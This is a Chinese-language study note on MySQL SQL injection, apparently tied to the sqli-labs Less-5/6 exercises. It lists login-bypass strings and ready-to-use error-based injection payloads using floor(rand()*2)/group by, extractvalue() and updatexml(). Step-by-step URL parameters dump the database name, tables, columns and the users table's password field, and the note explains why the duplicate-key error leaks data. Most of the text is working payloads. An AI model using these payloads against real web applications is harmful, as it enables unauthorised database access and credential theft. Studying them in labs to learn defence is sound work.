'or'1'='1'#
'or'1'='1'--+
第一个单引号闭合了应用拼接在输入前面的引号,`or '1'='1`(payload 末尾的引号把 `'1` 闭合)构成永真条件,WHERE 对表中每一行都成立,查询会返回该表的全部行。
随后的注释符(`#` 或 `-- `)把应用自带的结尾引号注释掉。登录逻辑通常只取结果集的第一行,所以登录成功的往往是表中的第一个账号。
万能密码利用的是把用户输入直接拼接进 SQL 的登录逻辑(未做参数化/转义),是最基础的一类 SQL 注入;只在应用确实拼接字符串时才会成功。注:`--+` 里的 `+` 经 URL 解码变成空格,MySQL 的 `--` 注释必须后跟空白字符才生效,直接写 `--` 会失败。
------------------------
------------------------
报错注入不一定要用 and 连接,用 or 连接同样能触发报错函数,前提是注入的表达式确实被数据库求值。
知识储备:
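-- Building blocks for floor(rand()*2) error-based injection (MySQL).
-- NOTE: MySQL comment delimiters are `-- ` (with trailing whitespace) or `#`;
-- `//` is not a comment and makes these lines fail to parse if pasted as-is.
select * from table1;
select count(*) from table1;                      -- number of rows returned
select rand();                                    -- random float in [0, 1)
select rand()*2;                                  -- random float in [0, 2): integer part is 0 or 1
select floor(1.56);                               -- round down -> 1
select floor(rand()*2);                           -- random integer, 0 or 1
select floor(rand()*2) a;                         -- alias the expression as `a` so the column header stays short
-- May be rejected under ONLY_FULL_GROUP_BY (default since 5.7.5) unless id is a key
-- the other columns functionally depend on.
select * from table1 group by id;                 -- group rows by the id column
select concat(1,2,3);                             -- string concatenation -> '123'
select password, count(*) as num from table1 group by password;  -- rows per distinct password, count aliased as num
-- 0x3a is the hex literal for ':'; hex literals need no quotes, which matters inside a payload.
select concat(0x3a,0x3a,"haha");                  -- ::haha
select concat(0x3a,0x3a,(select database()),0x3a,0x3a) a;                  -- ::<current db>::
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) a;  -- ::<current db>::0 or ::<current db>::1
select 'haha' from table1;                        -- one 'haha' per row in table1
select floor(rand()*2) a from table1;             -- one random 0/1 per row in table1
-- information_schema.columns is used as a row source because it always exists and has many rows.
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.columns;
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.columns group by a;
-- Without the alias the group key is spelled out in full; the two forms are equivalent:
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2));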
这不是 rand 函数的漏洞,而是 MySQL 文档说明的行为:同一条语句里 rand() 每次被引用都会重新求值。group by 时,键值在查找分组时算一次、插入新分组时再算一次,两次结果可能不同,于是可能插入一个已经存在的键,报 Duplicate entry 错误。
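-- Why `count(*) ... group by floor(rand()*2)` raises "Duplicate entry ... for key 'group_key'".
-- Run the statements top to bottom and compare the ones with and without `group by`.
select count(*) from table1;
-- count(*) next to a non-aggregated expression and no GROUP BY: one row, key computed once, no error.
select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.columns;

select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.columns;
select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.columns;
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.columns group by a;
-- The classic form: this is the statement that intermittently errors.
select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.columns group by a;
select count(*) from information_schema.columns;
select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.columns;
select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.columns group by a;
-- Same statement again: with an unseeded rand() each run may or may not error.
select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.columns group by a;
-- Control cases: a constant key (...,1) or (...,0) never errors; only the random key does.
select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,1);
select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,0);
select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2));
-- Mechanism (documented MySQL behaviour, not a bug): while grouping, the server computes the key
-- for a row and looks it up in the temporary result table; if the key is absent it evaluates the
-- expression AGAIN to insert the new group. Because rand() is re-evaluated, the inserted key can
-- differ from the looked-up one and collide with a group that already exists, which raises
-- "Duplicate entry '::<db>::1' for key 'group_key'" -- the error message carries the payload.
-- `group by a` and `group by concat(..., floor(rand()*2))` are the same thing: the alias is expanded.
-- `group by` groups, it does not sort. With an unseeded rand() the collision is probabilistic
-- (retry on failure). With rand(0) the sequence of floor(rand(0)*2) is fixed (0,1,1,0,1,1,...),
-- so the error is guaranteed as soon as the FROM table has at least 3 rows.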

按 MySQL 官方文档,rand() 在同一条语句里每次被引用都会重新求值,所以 group by 时用来查找分组的 a 值,和随后插入分组时重新算出的 a 值未必相同。
报错注入的适用情况:页面不回显查询结果(union 注入没有回显位),但数据库的报错信息会原样输出到页面。此时把要读的数据拼进一个会引发错误的表达式,让它随错误信息一起回显。
例题:sqli-labs Less-5、Less-6。注意:用不带种子的 rand() 时报错是概率性的,失败就重试;改用 rand(0) 则 floor(rand(0)*2) 的序列固定,只要 from 的表至少有 3 行就必定报错,不用碰运气。
方法1:floor() 函数
?id=2' --+ //可以判断出闭合
?id=-2' union select 1,2,3 --+ //没有回显位(union 的结果不显示在页面上),所以改用报错注入
//暴露数据库的库名
?id=2' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+
//暴露数据库的表名
?id=2' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+


方法2: extractvalue() 函数
0x7e 是十六进制的 "~",用来在报错信息里把要读的数据包起来,便于定位。注意:extractvalue()/updatexml() 报错时只显示 XPath 字符串的前 32 个字符,较长的数据要用 substr()/mid() 分段读取。
id=2' and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+
方法3:updatexml() 函数
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
方法4:multipoint() 等几何函数 (目前存在问题,待后续更新!) 注:几何函数报错注入依赖 MySQL 版本,不同版本的报错信息是否带出数据并不一致,先确认目标的 MySQL 版本再判断是否可用。
id=2' and multipoint((select * from (select * from (select database())a)b)) --+
报错注入
小知识:
select count(*) from table1;  -- 计算多少条数据
select rand();  -- 生成随机数 0-1
select floor(1.2);  -- 向下取整
select floor(rand()*2);  -- 生成 0/1 随机数
select floor(rand()*2)a;  -- 取一个别名
select * from table1 group by id;  -- 以 id 来进行分组
select concat(1,2,3);  -- 字符拼接
select password,count(*) as num from table1 group by password;  -- 统计不同密码有多少个,统计数据命名为 num,顺便按照 password 进行分组
0x3a = :
select concat('haha',0x3a,'nihao');  -- 输出 haha:nihao
----------
select concat(0x3a,0x3a,(select database()),0x3a,0x3a)a;  -- ::库名::
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a;
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2));
mysql 官方说:rand 函数每次出现都会重新计算一次
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from table1;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
group by a 是按 a 分组,a 里只有 0、1 且随机;rand() 在查找分组和插入新分组时各算一次,两次结果不同时就会插入一个已存在的键,从而报 Duplicate entry 错误(多试几次就会出现)。
实战:
id=1' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a)b) --+
id=1' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a)b) --+
?id=1' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a)b) --+
用十六进制写字符串(0x7365637572697479 = 'security')不需要引号,简单高效,引号被过滤或转义时也能用。
' and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+
' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
floor函数进行报错注入:
注出所有库(schema_name):
http://test?id=1' and (select 1 from (select count(*),concat(((select (schema_name) from information_schema.schemata limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -
http://test?id=2'and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -
当前数据库:
http://test?id=2' and (select 1 from (select count(*),concat(((select concat(database(),';'))),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -
当前数据库的表:
http://test?id=2' and (select 1 from (select count(*),concat(((select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -
列名(要加上 table_schema 限定,否则其他库里同名的 users 表的列也会被匹配到;limit 的偏移量从 0 开始逐个改):
http://test?id=2' and (select 1 from (select count(*),concat(((select concat(column_name,';') from information_schema.columns where table_schema='security' and table_name='users' limit 5,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -
报字段:
http://test?id=2' and (select 1 from (select count(*),concat(((select concat(password,';') from users limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -
说明:这里用 rand(0) 而不是 rand(),floor(rand(0)*2) 的序列固定为 0,1,1,0,1,1,…,只要 from 的表至少有 3 行就必定报错,不用靠运气;`-- -` 与 `--+` 等价,都是为了让 `--` 后面有空白字符。